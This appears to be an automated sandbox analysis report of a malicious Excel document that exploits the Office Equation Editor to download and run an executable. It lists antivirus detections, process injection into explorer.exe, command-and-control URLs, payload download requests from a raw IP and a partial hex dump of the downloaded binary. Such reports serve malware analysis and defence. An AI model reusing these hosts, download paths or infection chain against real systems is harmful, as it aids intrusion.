Source: 4.3.vbc.exe.331520.48.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0c38.38.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d00ad4.225.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31f438.67.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331774.248.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50f4.104.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced444.263.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d648e4.74.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79938.189.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71414.55.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.323000.141.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81520.45.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced5a0.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3292e0.43.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318b08.35.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d098.245.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7d0a8.94.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.39.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79a74.198.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321894.8.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d74008.147.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32b840.149.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.332094.284.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.320008.71.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d098.243.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331dfc.274.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.328fb8.157.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32e610.131.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31932c.192.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d65e30.138.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d448.261.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d444.265.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64b84.85.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d650f4.105.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321604.108.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d098.245.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d5a0.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce459c.33.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70ed4.89.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d5a0.8.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cb88.225.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0e80.54.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318d98.155.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80ed4.232.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329c94.204.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e368.17.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c8e4.217.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d793d4.176.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced378.256.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d8199c.254.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d00008.214.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce932c.192.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.325be4.13.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d620.285.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe2fc.123.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.42.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e0.219.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315388.120.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68e6c.39.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d60b08.35.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.320ad4.83.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7b840.150.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4f28.96.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d4f0.273.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.332094.286.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1894.11.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7db70.110.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329f90.15.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced098.244.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c008.208.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf5be4.12.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32909c.163.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecd5c.231.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf909c.163.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d73014.137.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5e30.136.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01520.46.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33154c.244.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c8e4.217.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced620.285.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6914c.179.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.40.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6fb84.28.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9f80.28.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3185dc.153.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce48e4.72.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.319308.7.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe610.131.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d82764.16.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf19ac.114.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce932c.191.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce459c.30.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1894.8.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64b84.84.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0199c.253.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecb84.227.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0058c.218.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81c54.262.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8b08.37.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf0008.71.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.169.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.167.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32058c.75.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6911c.54.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d1ac.247.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7f438.210.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4370.24.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4d5c.89.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32e2fc.126.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71604.106.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.167.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfb840.150.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d444.263.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced620.283.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33199c.253.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3ffc.87.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfd0a8.93.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce52c8.112.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4370.25.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf0ed4.91.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1414.56.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d790f4.170.unpack	Avira: Label: TR/Patched.Ren.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	4_2_004057AC
Source: C:\Users\user\Odhbljup.exe	Code function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	7_2_004057AC
Source: C:\Users\user\Odhbljup.exe	Code function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	10_2_004057AC

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.250.31.113:80

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: onedrive.live.com

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\NAPSTAT.EXE

Code function: 4x nop then pop ebx

12_2_00086AB7

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 13.250.31.113:80

Networking:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 87.98.234.164 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.urzeczenie.com

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.heidecide.xyz/hno0/

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1Host: www.urzeczenie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Dec 2021 18:33:47 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25Last-Modified: Thu, 02 Dec 2021 09:01:28 GMTETag: "aa600-5d2260935ec6b"Accept-Ranges: bytesContent-Length: 697856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9e 05 00 00 04 05 00 00 00 00 00 10 ac 05 00 00 10 00 00 00 b0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 0b 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0a 21 00 00 00 a0 06 00 00 66 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 6c 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 5c 9c 05 00 00 10 00 00 00 9e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 80 14 00 00 00 b0 05 00 00 16 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 a5 0d 00 00 00 d0 05 00 00 00 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 0a 21 00 00 00 e0 05 00 00 22 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 06 00 00 00 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 06 00 00 02 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 6c 63 00 00 00 30 06 00 00 64 00 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 66 04 00 00 a0 06 00 00 66 04 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0b 00 00 00 00 00 00 a6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /7009/binso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.250.31.113Connection: Keep-Alive

Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.524090665.00000000044E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: vbc.exe, 00000004.00000002.562388389.0000000003440000.00000004.00000001.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=019F6FABB02B7788&resid=19F6FABB02B7788%21112&authkey=AE1p912K
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: https://onedrive.live.com/h
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp	String found in binary or memory: https://prigmg.am.files.1drv.com/
Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: https://prigmg.am.files.1drv.com/y4mfRNWO7SrNuAYoryEOMK_9RlPbjHtMV-Ced5E-MYQaa4drd6L19k6a-_ziTYMgTYz
Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp	String found in binary or memory: https://prigmg.am.files.1drv.com/y4mqjjzWO8S-4gOMPNZjROyLuecmLMO_yUlIbF8EkCZOGaN9ucABdXCb_4exrao8vW7
Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: https://prigmg.am.files.1drv.com/y4mwh1Q_kqHdVkzavMrAxJ1wAVvTumvDrRTyon4A-0Nej1qBpoUH6im7VZQh8GfsFzJ
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A766E4F6.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: global traffic	HTTP traffic detected: GET /7009/binso.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.250.31.113Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1Host: www.urzeczenie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Dec 2021 18:35:28 GMTServer: Apache/2Content-Length: 392Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6e 6f 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 75 72 7a 65 63 7a 65 6e 69 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not 